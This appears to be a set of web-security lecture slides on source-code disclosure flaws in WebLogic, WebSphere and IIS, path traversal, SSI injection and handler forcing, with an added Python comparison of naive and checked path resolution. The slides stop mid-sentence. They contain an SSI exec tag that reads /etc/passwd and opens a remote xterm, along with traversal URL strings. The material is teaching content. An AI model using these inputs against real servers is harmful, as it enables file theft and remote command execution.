WebLogic Server X

More Source Code Disclosure
- URL prefixes for source code disclosure:
  - /servlet/file/ (IBM WebSphere)
  - /file/ (BEA WebLogic)
  - /*.shtml/ (BEA WebLogic)
  - /ConsoleHelp/ (BEA WebLogic)
  - /servlet/ (Sun JavaWebServer)
- Advisories on Foundstone's advisories page:

Another example
- IIS "+.htr" bug.
- View source code of ASP/ASA files.
- URL interpretation vulnerability.
- ".htr" causes to handle the URL.
- Characters after the "+" sign (space) are ignored.

Other Source Code Disclosures
- Some applications access files without appropriate checking.
- Input validation vulnerability.
- No checking performed for file type or location.
- Filenames can be manipulated via parameters passed on the URL or as hidden fields.
- Example: or

IIS
- Bundled with IIS samples in NT Option Pack .
- Allows an attacker to view arbitrary files using the following URL: source=/msadc/../../../../../path/to/

IIS
- Example:

Input Validation and SSI
- SSI (Server Side Includes) tags allow commands to be executed locally on the system via exec tags.
- Some applications save user inputs on a local file.
- Malicious SSI tags can be uploaded via such applications.
- The result: Remote Command Execution!

SSI
- One of the many free CGI scripts available.
- Vulnerable on servers that parse .html files through SSI.

SSI
- Insert SSI tags as guestbook comments.

[Diagram: SSI web server with addguest.html, guestbook.html and mod_ssi. Commands shown: cat /etc/passwd; xterm &. Comment submitted: !exec cmd="cat /etc/passwd; /usr/X11/bin/xterm display :"]
Guestbook comment contains SSI tag which is saved in on the server.

[Diagram: the same SSI web server, addguest.html, guestbook.html and mod_ssi, with the comment !exec cmd="cat /etc/passwd; /usr/X11/bin/xterm display :" producing passwd and xterm.]
.html files are registered to be parsed by mod_ssi, causing the SSI tags to be parsed and the command executed.

Web Server Architecture Attacks
- Sometimes the way web servers are implemented can lead to vulnerabilities.
- A common attack is to bypass the web server configuration directives, and invoke built-in procedures directly.
- A close look at the web server architecture can reveal holes.

Web Server Architecture Attacks
[Diagram: web server dispatching requests to handlers. Default handler: html, text/html header. shtml handler: process SSI tags (exec, include) using /bin/sh and include file, text/html header. jsp handler: process JSP tags, Java compiler, class, Java runtime. cgi handler: script/executable (sh, perl, …), text/html header.]

Web Server Architecture Attacks
Handler Forcing:
- Certain m
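
The "Other Source Code Disclosures" slide above names the root cause as a file parameter used with no check on file type or location. The following is an added example, not code from the original slides, that puts that unchecked lookup beside a checked one. The function names, the ALLOWED_EXT allow-list and the wwwroot layout are assumptions made for illustration.

```python
import os
import tempfile

ALLOWED_EXT = {".txt", ".html"}  # assumption: types this viewer may serve


def resolve_naive(base_dir, source):
    # Pattern the slide describes: the URL parameter is joined to the
    # base directory with no check on file type or final location.
    return os.path.normpath(os.path.join(base_dir, source.lstrip("/")))


def resolve_checked(base_dir, source):
    """Return the real path for `source`, or None if it is rejected."""
    if "\x00" in source:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks, so the
    # containment test below sees the file that would really be opened.
    target = os.path.realpath(os.path.join(base, source.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        return None  # resolved outside the document root
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXT:
        return None  # file type not on the allow-list
    return target if os.path.isfile(target) else None


def demo():
    # Constructed layout: a document root holding a public text file and
    # a script, plus a file that sits one level above the root.
    top = tempfile.mkdtemp()
    root = os.path.join(top, "wwwroot")
    os.makedirs(os.path.join(root, "msadc"))
    for path in (os.path.join(root, "msadc", "readme.txt"),
                 os.path.join(root, "app.asp"),
                 os.path.join(top, "secret.txt")):
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    requests = ["/msadc/readme.txt", "/msadc/../../secret.txt", "/app.asp"]
    return root, {r: (resolve_naive(root, r), resolve_checked(root, r))
                  for r in requests}


if __name__ == "__main__":
    for req, (naive, checked) in demo()[1].items():
        print(f"{req!r}: naive={naive} checked={checked}")
```

The checked version rejects both the traversal request and the request for script source, while still serving the one file that is inside the root and on the allow-list.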